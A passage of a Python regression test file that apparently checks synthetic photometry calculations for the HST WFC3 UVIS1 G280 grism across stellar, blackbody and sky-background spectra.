'uvsp1006.tab:5122', 'uvsp1006.tab:5123', 'uvsp1006.tab:5124', 'uvsp1006.tab:5125', 'uvsp1006.tab:5126', 'uvsp1006.tab:5127', 'uvsp1006.tab:5128', 'uvsp1006.tab:5129', 'uvsp1006.tab:5130', 'uvsp1006.tab:5131', 'uvsp1006.tab:5132', 'uvsp1006.tab:5133', 'uvsp1006.tab:5134', 'uvsp1006.tab:5135', 'uvsp1006.tab:5136', 'uvsp1006.tab:5137', 'uvsp1006.tab:5138', 'uvsp1006.tab:5139', 'uvsp1006.tab:5140', 'uvsp1006.tab:5141', 'uvsp1006.tab:5142', 'uvsp1006.tab:5143', 'uvsp1006.tab:5144', 'uvsp1006.tab:5145', 'uvsp1006.tab:5146', 'uvsp1006.tab:5147', 'uvsp1006.tab:5148', 'uvsp1006.tab:5149']"
self.setglobal(__file__)
self.runpy()
class calcphotCase1(basecase.calcphotCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280,bkg"
self.spectrum="spec(earthshine.fits)*0.5+rn(spec(Zodi.fits),band(johnson,v),22.7,vegamag)+(spec(el1215a.fits)+spec(el1302a.fits)+spec(el1356a.fits)+spec(el2471a.fits))"
self.subset=True
self.etcid="['uvsp1006.tab:5000', 'uvsp1006.tab:5001', 'uvsp1006.tab:5002', 'uvsp1006.tab:5003', 'uvsp1006.tab:5004', 'uvsp1006.tab:5005', 'uvsp1006.tab:5006', 'uvsp1006.tab:5007', 'uvsp1006.tab:5008', 'uvsp1006.tab:5009', 'uvsp1006.tab:5010', 'uvsp1006.tab:5011', 'uvsp1006.tab:5012', 'uvsp1006.tab:5013', 'uvsp1006.tab:5014', 'uvsp1006.tab:5015', 'uvsp1006.tab:5016', 'uvsp1006.tab:5017', 'uvsp1006.tab:5018', 'uvsp1006.tab:5019', 'uvsp1006.tab:5020', 'uvsp1006.tab:5021', 'uvsp1006.tab:5022', 'uvsp1006.tab:5023', 'uvsp1006.tab:5024', 'uvsp1006.tab:5025', 'uvsp1006.tab:5026', 'uvsp1006.tab:5027', 'uvsp1006.tab:5028', 'uvsp1006.tab:5029', 'uvsp1006.tab:5030', 'uvsp1006.tab:5031', 'uvsp1006.tab:5032', 'uvsp1006.tab:5033', 'uvsp1006.tab:5034', 'uvsp1006.tab:5035', 'uvsp1006.tab:5036', 'uvsp1006.tab:5037', 'uvsp1006.tab:5038', 'uvsp1006.tab:5039', 'uvsp1006.tab:5040', 'uvsp1006.tab:5041', 'uvsp1006.tab:5042', 'uvsp1006.tab:5043', 'uvsp1006.tab:5044', 'uvsp1006.tab:5045', 'uvsp1006.tab:5046', 'uvsp1006.tab:5047', 'uvsp1006.tab:5048', 'uvsp1006.tab:5049', 'uvsp1006.tab:5050', 'uvsp1006.tab:5051', 'uvsp1006.tab:5052', 'uvsp1006.tab:5053', 'uvsp1006.tab:5054', 'uvsp1006.tab:5055', 'uvsp1006.tab:5056', 'uvsp1006.tab:5057', 'uvsp1006.tab:5058', 'uvsp1006.tab:5059', 'uvsp1006.tab:5060', 'uvsp1006.tab:5061', 'uvsp1006.tab:5062', 'uvsp1006.tab:5063', 'uvsp1006.tab:5064', 'uvsp1006.tab:5065', 'uvsp1006.tab:5066', 'uvsp1006.tab:5067', 'uvsp1006.tab:5068', 'uvsp1006.tab:5069', 'uvsp1006.tab:5070', 'uvsp1006.tab:5071', 'uvsp1006.tab:5072', 'uvsp1006.tab:5073', 'uvsp1006.tab:5074', 'uvsp1006.tab:5075', 'uvsp1006.tab:5076', 'uvsp1006.tab:5077', 'uvsp1006.tab:5078', 'uvsp1006.tab:5079', 'uvsp1006.tab:5080', 'uvsp1006.tab:5081', 'uvsp1006.tab:5082', 'uvsp1006.tab:5083', 'uvsp1006.tab:5084', 'uvsp1006.tab:5085', 'uvsp1006.tab:5086', 'uvsp1006.tab:5087', 'uvsp1006.tab:5088', 'uvsp1006.tab:5089', 'uvsp1006.tab:5090', 'uvsp1006.tab:5091', 'uvsp1006.tab:5092', 'uvsp1006.tab:5093', 'uvsp1006.tab:5094', 'uvsp1006.tab:5095', 'uvsp1006.tab:5096', 'uvsp1006.tab:5097', 'uvsp1006.tab:5098', 'uvsp1006.tab:5099', 'uvsp1006.tab:5100', 'uvsp1006.tab:5101', 'uvsp1006.tab:5102', 'uvsp1006.tab:5103', 'uvsp1006.tab:5104', 'uvsp1006.tab:5105', 'uvsp1006.tab:5106', 'uvsp1006.tab:5107', 'uvsp1006.tab:5108', 'uvsp1006.tab:5109', 'uvsp1006.tab:5110', 'uvsp1006.tab:5111', 'uvsp1006.tab:5112', 'uvsp1006.tab:5113', 'uvsp1006.tab:5114', 'uvsp1006.tab:5115', 'uvsp1006.tab:5116', 'uvsp1006.tab:5117', 'uvsp1006.tab:5118', 'uvsp1006.tab:5119', 'uvsp1006.tab:5120', 'uvsp1006.tab:5121', 'uvsp1006.tab:5122', 'uvsp1006.tab:5123', 'uvsp1006.tab:5124', 'uvsp1006.tab:5125', 'uvsp1006.tab:5126', 'uvsp1006.tab:5127', 'uvsp1006.tab:5128', 'uvsp1006.tab:5129', 'uvsp1006.tab:5130', 'uvsp1006.tab:5131', 'uvsp1006.tab:5132', 'uvsp1006.tab:5133', 'uvsp1006.tab:5134', 'uvsp1006.tab:5135', 'uvsp1006.tab:5136', 'uvsp1006.tab:5137', 'uvsp1006.tab:5138', 'uvsp1006.tab:5139', 'uvsp1006.tab:5140', 'uvsp1006.tab:5141', 'uvsp1006.tab:5142', 'uvsp1006.tab:5143', 'uvsp1006.tab:5144', 'uvsp1006.tab:5145', 'uvsp1006.tab:5146', 'uvsp1006.tab:5147', 'uvsp1006.tab:5148', 'uvsp1006.tab:5149']"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase1(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(icat(k93models,9230,0.0,4.1),band(johnson,v),23.0,vegamag)"
self.subset=True
self.etcid="['uvsp1006.tab:5000', 'uvsp1006.tab:5002', 'uvsp1006.tab:5003', 'uvsp1006.tab:5004', 'uvsp1006.tab:5005', 'uvsp1006.tab:5007', 'uvsp1006.tab:5008', 'uvsp1006.tab:5009', 'uvsp1006.tab:5010', 'uvsp1006.tab:5012', 'uvsp1006.tab:5013', 'uvsp1006.tab:5014', 'uvsp1006.tab:5015', 'uvsp1006.tab:5017', 'uvsp1006.tab:5018', 'uvsp1006.tab:5019', 'uvsp1006.tab:5020', 'uvsp1006.tab:5022', 'uvsp1006.tab:5023', 'uvsp1006.tab:5024', 'uvsp1006.tab:5025', 'uvsp1006.tab:5027', 'uvsp1006.tab:5028', 'uvsp1006.tab:5029', 'uvsp1006.tab:5030', 'uvsp1006.tab:5031', 'uvsp1006.tab:5032', 'uvsp1006.tab:5033', 'uvsp1006.tab:5034', 'uvsp1006.tab:5035', 'uvsp1006.tab:5036', 'uvsp1006.tab:5037', 'uvsp1006.tab:5038', 'uvsp1006.tab:5039', 'uvsp1006.tab:5040', 'uvsp1006.tab:5041', 'uvsp1006.tab:5042', 'uvsp1006.tab:5043', 'uvsp1006.tab:5044', 'uvsp1006.tab:5045', 'uvsp1006.tab:5046', 'uvsp1006.tab:5047', 'uvsp1006.tab:5048', 'uvsp1006.tab:5049', 'uvsp1006.tab:5050', 'uvsp1006.tab:5051', 'uvsp1006.tab:5052', 'uvsp1006.tab:5053', 'uvsp1006.tab:5054', 'uvsp1006.tab:5055', 'uvsp1006.tab:5056', 'uvsp1006.tab:5057', 'uvsp1006.tab:5058', 'uvsp1006.tab:5059', 'uvsp1006.tab:5060', 'uvsp1006.tab:5061', 'uvsp1006.tab:5062', 'uvsp1006.tab:5063', 'uvsp1006.tab:5064', 'uvsp1006.tab:5065', 'uvsp1006.tab:5066', 'uvsp1006.tab:5067', 'uvsp1006.tab:5068', 'uvsp1006.tab:5069', 'uvsp1006.tab:5070', 'uvsp1006.tab:5071', 'uvsp1006.tab:5072', 'uvsp1006.tab:5073', 'uvsp1006.tab:5074', 'uvsp1006.tab:5075', 'uvsp1006.tab:5076', 'uvsp1006.tab:5077', 'uvsp1006.tab:5078', 'uvsp1006.tab:5079', 'uvsp1006.tab:5080', 'uvsp1006.tab:5081', 'uvsp1006.tab:5082', 'uvsp1006.tab:5083', 'uvsp1006.tab:5084', 'uvsp1006.tab:5085', 'uvsp1006.tab:5086', 'uvsp1006.tab:5087', 'uvsp1006.tab:5088', 'uvsp1006.tab:5089', 'uvsp1006.tab:5090', 'uvsp1006.tab:5091', 'uvsp1006.tab:5092', 'uvsp1006.tab:5093', 'uvsp1006.tab:5094', 'uvsp1006.tab:5095', 'uvsp1006.tab:5096', 'uvsp1006.tab:5097', 'uvsp1006.tab:5098', 'uvsp1006.tab:5099', 'uvsp1006.tab:5100', 'uvsp1006.tab:5101']"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase2(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(icat(k93models,9230,0.0,4.1),band(johnson,v),18.0,vegamag)"
self.subset=False
self.etcid="['uvsp1006.tab:5001', 'uvsp1006.tab:5006', 'uvsp1006.tab:5011', 'uvsp1006.tab:5016', 'uvsp1006.tab:5021', 'uvsp1006.tab:5026']"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase4(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(icat(k93models,9230,0.0,4.1),band(johnson,v),17.0,vegamag)"
self.subset=False
self.etcid="['uvsp1006.tab:5102', 'uvsp1006.tab:5103', 'uvsp1006.tab:5104', 'uvsp1006.tab:5105', 'uvsp1006.tab:5106', 'uvsp1006.tab:5107', 'uvsp1006.tab:5108', 'uvsp1006.tab:5109', 'uvsp1006.tab:5110', 'uvsp1006.tab:5111', 'uvsp1006.tab:5112', 'uvsp1006.tab:5113', 'uvsp1006.tab:5114', 'uvsp1006.tab:5115', 'uvsp1006.tab:5116', 'uvsp1006.tab:5117', 'uvsp1006.tab:5118', 'uvsp1006.tab:5119', 'uvsp1006.tab:5120', 'uvsp1006.tab:5121', 'uvsp1006.tab:5122', 'uvsp1006.tab:5123', 'uvsp1006.tab:5124', 'uvsp1006.tab:5125']"
self.setglobal(__file__)
self.runpy()
class calcspecCase127(basecase.calcspecCase):
def setUp(self):
self.obsmode="None"
self.spectrum="icat(k93models,30000,0.0,4.0)"
self.subset=False
self.etcid="None"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase5(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(icat(k93models,30000,0.0,4.0)*ebmvx(0.04,gal1),band(johnson,b),23.0,vegamag)"
self.subset=False
self.etcid="uvsp1006.tab:5126"
self.setglobal(__file__)
self.runpy()
class calcspecCase128(basecase.calcspecCase):
def setUp(self):
self.obsmode="None"
self.spectrum="icat(k93models,25400,0.0,3.9)"
self.subset=False
self.etcid="None"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase6(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(icat(k93models,25400,0.0,3.9)*ebmvx(0.08,gal1),band(johnson,b),23.0,vegamag)"
self.subset=False
self.etcid="None"
self.setglobal(__file__)
self.runpy()
class calcspecCase129(basecase.calcspecCase):
def setUp(self):
self.obsmode="None"
self.spectrum="icat(k93models,18700,0.0,3.9)"
self.subset=False
self.etcid="None"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase7(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(icat(k93models,18700,0.0,3.9)*ebmvx(0.12,gal3),band(johnson,b),23.0,vegamag)"
self.subset=False
self.etcid="uvsp1006.tab:5128"
self.setglobal(__file__)
self.runpy()
class calcspecCase130(basecase.calcspecCase):
def setUp(self):
self.obsmode="None"
self.spectrum="icat(k93models,15400,0.0,3.9)"
self.subset=False
self.etcid="None"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase8(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(icat(k93models,15400,0.0,3.9)*ebmvx(0.16,smc),band(johnson,b),23.0,vegamag)"
self.subset=False
self.etcid="uvsp1006.tab:5129"
self.setglobal(__file__)
self.runpy()
class calcspecCase131(basecase.calcspecCase):
def setUp(self):
self.obsmode="None"
self.spectrum="icat(k93models,11900,0.0,4.0)"
self.subset=False
self.etcid="None"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase9(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(icat(k93models,11900,0.0,4.0)*ebmvx(0.2,lmc),band(johnson,b),23.0,vegamag)"
self.subset=False
self.etcid="uvsp1006.tab:5130"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase10(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(icat(k93models,9230,0.0,4.1)*ebmvx(0.24,xgal),band(johnson,b),23.0,vegamag)"
self.subset=False
self.etcid="uvsp1006.tab:5131"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase11(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(spec(/grp/hst/cdbs//grid/pickles/dat_uvk/pickles_uk_1.fits),band(cousins,i),23.0,vegamag)*ebmvx(0.04,gal1)"
self.subset=True
self.etcid="uvsp1006.tab:5132"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase12(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(spec(/grp/hst/cdbs//grid/pickles/dat_uvk/pickles_uk_1.fits),band(cousins,i),23.0,vegamag)*ebmvx(0.08,gal1)"
self.subset=False
self.etcid="None"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase13(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(spec(/grp/hst/cdbs//grid/pickles/dat_uvk/pickles_uk_2.fits),band(cousins,i),23.0,vegamag)*ebmvx(0.12,gal3)"
self.subset=True
self.etcid="uvsp1006.tab:5134"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase14(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(spec(/grp/hst/cdbs//grid/pickles/dat_uvk/pickles_uk_2.fits),band(cousins,i),23.0,vegamag)*ebmvx(0.16,smc)"
self.subset=False
self.etcid="uvsp1006.tab:5135"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase15(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(spec(/grp/hst/cdbs//grid/pickles/dat_uvk/pickles_uk_3.fits),band(cousins,i),23.0,vegamag)*ebmvx(0.2,lmc)"
self.subset=True
self.etcid="uvsp1006.tab:5136"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase16(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(spec(/grp/hst/cdbs//grid/pickles/dat_uvk/pickles_uk_4.fits),band(cousins,i),23.0,vegamag)*ebmvx(0.24,xgal)"
self.subset=False
self.etcid="uvsp1006.tab:5137"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase17(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(spec(/grp/hst/cdbs//grid/pickles/dat_uvk/pickles_uk_5.fits),band(cousins,i),23.0,vegamag)*ebmvx(0.04,gal1)"
self.subset=True
self.etcid="uvsp1006.tab:5138"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase18(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(spec(/grp/hst/cdbs//grid/pickles/dat_uvk/pickles_uk_5.fits),band(cousins,i),23.0,vegamag)*ebmvx(0.08,gal1)"
self.subset=False
self.etcid="None"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase19(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(spec(/grp/hst/cdbs//grid/pickles/dat_uvk/pickles_uk_6.fits),band(cousins,i),23.0,vegamag)*ebmvx(0.12,gal3)"
self.subset=False
self.etcid="uvsp1006.tab:5140"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase20(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(spec(/grp/hst/cdbs//grid/pickles/dat_uvk/pickles_uk_10.fits),band(cousins,i),23.0,vegamag)*ebmvx(0.16,smc)"
self.subset=False
self.etcid="None"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase21(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(spec(/grp/hst/cdbs//grid/pickles/dat_uvk/pickles_uk_11.fits),band(cousins,i),23.0,vegamag)*ebmvx(0.2,lmc)"
self.subset=False
self.etcid="None"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase22(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(spec(/grp/hst/cdbs//grid/pickles/dat_uvk/pickles_uk_12.fits),band(cousins,i),23.0,vegamag)*ebmvx(0.24,xgal)"
self.subset=False
self.etcid="None"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase23(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(spec(/grp/hst/cdbs//grid/pickles/dat_uvk/pickles_uk_9.fits),band(cousins,i),23.0,vegamag)*ebmvx(0.04,gal1)"
self.subset=False
self.etcid="uvsp1006.tab:5144"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase24(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(spec(/grp/hst/cdbs//grid/pickles/dat_uvk/pickles_uk_14.fits),band(cousins,i),23.0,vegamag)*ebmvx(0.08,gal1)"
self.subset=False
self.etcid="None"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase25(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(z(spec(/grp/hst/cdbs//calspec/g191b2b_mod_004.fits),0.05),band(johnson,b),23.0,vegamag)"
self.subset=True
self.etcid="uvsp1006.tab:5146"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase26(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(z(spec(/grp/hst/cdbs//calspec/gd153_mod_004.fits),0.1),band(johnson,b),23.0,vegamag)"
self.subset=False
self.etcid="uvsp1006.tab:5147"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase27(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(z(spec(/grp/hst/cdbs//calspec/gd71_mod_005.fits),0.15),band(johnson,b),23.0,vegamag)"
self.subset=False
self.etcid="uvsp1006.tab:5148"
self.setglobal(__file__)
self.runpy()
class calcspecCase133(basecase.calcspecCase):
def setUp(self):
self.obsmode="None"
self.spectrum="bb(10000)"
self.subset=True
self.etcid="None"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase28(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(bb(10000),band(johnson,u),23.0,vegamag)"
self.subset=True
self.etcid="uvsp1006.tab:5149"
self.setglobal(__file__)
self.runpy()
class countrateCase3(basecase.countrateCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280,bkg"
self.spectrum="spec(earthshine.fits)*0.5+rn(spec(Zodi.fits),band(johnson,v),22.1,vegamag)+(spec(el1215a.fits)+spec(el1302a.fits)+spec(el1356a.fits)+spec(el2471a.fits))"
self.subset=False
self.etcid="uvsp1006.tab:5150"
self.setglobal(__file__)
self.runpy()
class calcphotCase3(basecase.calcphotCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280,bkg"
self.spectrum="spec(earthshine.fits)*0.5+rn(spec(Zodi.fits),band(johnson,v),22.1,vegamag)+(spec(el1215a.fits)+spec(el1302a.fits)+spec(el1356a.fits)+spec(el2471a.fits))"
self.subset=False
self.etcid="uvsp1006.tab:5150"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase29(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(bb(10000),band(johnson,r),23.0,vegamag)"
self.subset=False
self.etcid="uvsp1006.tab:5150"
self.setglobal(__file__)
self.runpy()
class countrateCase4(basecase.countrateCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280,bkg"
self.spectrum="spec(earthshine.fits)*0.5+rn(spec(Zodi.fits),band(johnson,v),23.3,vegamag)+(spec(el1215a.fits)+spec(el1302a.fits)+spec(el1356a.fits)+spec(el2471a.fits))"
self.subset=False
self.etcid="uvsp1006.tab:5151"
self.setglobal(__file__)
self.runpy()
class calcphotCase4(basecase.calcphotCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280,bkg"
self.spectrum="spec(earthshine.fits)*0.5+rn(spec(Zodi.fits),band(johnson,v),23.3,vegamag)+(spec(el1215a.fits)+spec(el1302a.fits)+spec(el1356a.fits)+spec(el2471a.fits))"
self.subset=False
self.etcid="uvsp1006.tab:5151"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase30(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(bb(10000),band(johnson,i),23.0,vegamag)"
self.subset=False
self.etcid="uvsp1006.tab:5151"
self.setglobal(__file__)
self.runpy()
class countrateCase5(basecase.countrateCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280,bkg"
self.spectrum="spec(earthshine.fits)*0.5+rn(spec(Zodi.fits),band(johnson,v),21.7,vegamag)+(spec(el1215a.fits)+spec(el1302a.fits)+spec(el1356a.fits)+spec(el2471a.fits))"
self.subset=False
self.etcid="uvsp1006.tab:5152"
self.setglobal(__file__)
self.runpy()
class calcphotCase5(basecase.calcphotCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280,bkg"
self.spectrum="spec(earthshine.fits)*0.5+rn(spec(Zodi.fits),band(johnson,v),21.7,vegamag)+(spec(el1215a.fits)+spec(el1302a.fits)+spec(el1356a.fits)+spec(el2471a.fits))"
self.subset=False
self.etcid="uvsp1006.tab:5152"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase31(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(bb(10000),band(johnson,j),23.0,vegamag)"
self.subset=False
self.etcid="uvsp1006.tab:5152"
self.setglobal(__file__)
self.runpy()
class countrateCase6(basecase.countrateCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280,bkg"
self.spectrum="spec(earthshine.fits)*0.5+rn(spec(Zodi.fits),band(johnson,v),22.424602593467696,vegamag)+(spec(el1215a.fits)+spec(el1302a.fits)+spec(el1356a.fits)+spec(el2471a.fits))"
self.subset=False
self.etcid="uvsp1006.tab:5153"
self.setglobal(__file__)
self.runpy()
class calcphotCase6(basecase.calcphotCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280,bkg"
self.spectrum="spec(earthshine.fits)*0.5+rn(spec(Zodi.fits),band(johnson,v),22.424602593467696,vegamag)+(spec(el1215a.fits)+spec(el1302a.fits)+spec(el1356a.fits)+spec(el2471a.fits))"
self.subset=False
self.etcid="uvsp1006.tab:5153"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase32(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(bb(10000),band(johnson,k),23.0,vegamag)"
self.subset=False
self.etcid="uvsp1006.tab:5153"
self.setglobal(__file__)
self.runpy()
class countrateCase7(basecase.countrateCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280,bkg"
self.spectrum="spec(earthshine.fits)*0.5+spec(Zodi.fits)*0.5+(spec(el1215a.fits)+spec(el1302a.fits)+spec(el1356a.fits)+spec(el2471a.fits))"
self.subset=False
self.etcid="uvsp1006.tab:5154"
self.setglobal(__file__)
self.runpy()
class calcphotCase7(basecase.calcphotCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280,bkg"
self.spectrum="spec(earthshine.fits)*0.5+spec(Zodi.fits)*0.5+(spec(el1215a.fits)+spec(el1302a.fits)+spec(el1356a.fits)+spec(el2471a.fits))"
self.subset=False
self.etcid="uvsp1006.tab:5154"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase33(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(bb(10000),band(cousins,r),23.0,vegamag)"
self.subset=False
self.etcid="uvsp1006.tab:5154"
self.setglobal(__file__)
self.runpy()
class calcspecCase139(basecase.calcspecCase):
def setUp(self):
self.obsmode="None"
self.spectrum="pl(4000.0,-2.0,flam)"
self.subset=False
self.etcid="None"
self.setglobal(__file__)
self.runpy()
class countrateCase8(basecase.countrateCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280,bkg"
self.spectrum="spec(earthshine.fits)*2.0+rn(spec(Zodi.fits),band(johnson,v),22.7,vegamag)+(spec(el1215a.fits)+spec(el1302a.fits)+spec(el1356a.fits)+spec(el2471a.fits))"
self.subset=False
self.etcid="uvsp1006.tab:5155"
self.setglobal(__file__)
self.runpy()
class calcphotCase8(basecase.calcphotCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280,bkg"
self.spectrum="spec(earthshine.fits)*2.0+rn(spec(Zodi.fits),band(johnson,v),22.7,vegamag)+(spec(el1215a.fits)+spec(el1302a.fits)+spec(el1356a.fits)+spec(el2471a.fits))"
self.subset=False
self.etcid="uvsp1006.tab:5155"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase34(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(pl(4000.0,-2.0,flam),band(bessell,h),23.0,vegamag)"
self.subset=True
self.etcid="uvsp1006.tab:5155"
self.setglobal(__file__)
self.runpy()
class countrateCase9(basecase.countrateCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280,bkg"
self.spectrum="spec(earthshine.fits)+rn(spec(Zodi.fits),band(johnson,v),22.7,vegamag)+(spec(el1215a.fits)+spec(el1302a.fits)+spec(el1356a.fits)+spec(el2471a.fits))"
self.subset=False
self.etcid="uvsp1006.tab:5156"
self.setglobal(__file__)
self.runpy()
class calcphotCase9(basecase.calcphotCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280,bkg"
self.spectrum="spec(earthshine.fits)+rn(spec(Zodi.fits),band(johnson,v),22.7,vegamag)+(spec(el1215a.fits)+spec(el1302a.fits)+spec(el1356a.fits)+spec(el2471a.fits))"
self.subset=False
self.etcid="uvsp1006.tab:5156"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase35(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(pl(4000.0,-2.0,flam),band(Bessell,j),23.0,vegamag)"
self.subset=False
self.etcid="uvsp1006.tab:5156"
self.setglobal(__file__)
self.runpy()
class countrateCase10(basecase.countrateCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280,bkg"
self.spectrum="rn(spec(Zodi.fits),band(johnson,v),22.7,vegamag)+(spec(el1215a.fits)+spec(el1302a.fits)+spec(el1356a.fits)+spec(el2471a.fits))"
self.subset=False
self.etcid="uvsp1006.tab:5157"
self.setglobal(__file__)
self.runpy()
class calcphotCase10(basecase.calcphotCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280,bkg"
self.spectrum="rn(spec(Zodi.fits),band(johnson,v),22.7,vegamag)+(spec(el1215a.fits)+spec(el1302a.fits)+spec(el1356a.fits)+spec(el2471a.fits))"
self.subset=False
self.etcid="uvsp1006.tab:5157"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase36(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(pl(4000.0,-2.0,flam),band(bessell,k),23.0,vegamag)"
self.subset=False
self.etcid="uvsp1006.tab:5157"
self.setglobal(__file__)
self.runpy()
if __name__ == '__main__':
if 'debug' in sys.argv:
testutil.debug(__name__)
else:
testutil.testall(__name__,2)
#calcspec:141 - 133 dup =8
#thermback:0 - 0 dup =0
#calcphot:10 - 1 dup =9
#countrate:10 - 1 dup =9
#SpecSourcerateSpec:36 - 1 dup =35
| 60.506931
| 3,171
| 0.683466
| 4,065
| 30,556
| 5.061747
| 0.086101
| 0.24966
| 0.035575
| 0.047434
| 0.922677
| 0.919032
| 0.888316
| 0.878694
| 0.87811
| 0.872764
| 0
| 0.188913
| 0.139874
| 30,556
| 504
| 3,172
| 60.626984
| 0.593981
| 0.004091
| 0
| 0.733871
| 0
| 0.104839
| 0.536219
| 0.189838
| 0
| 0
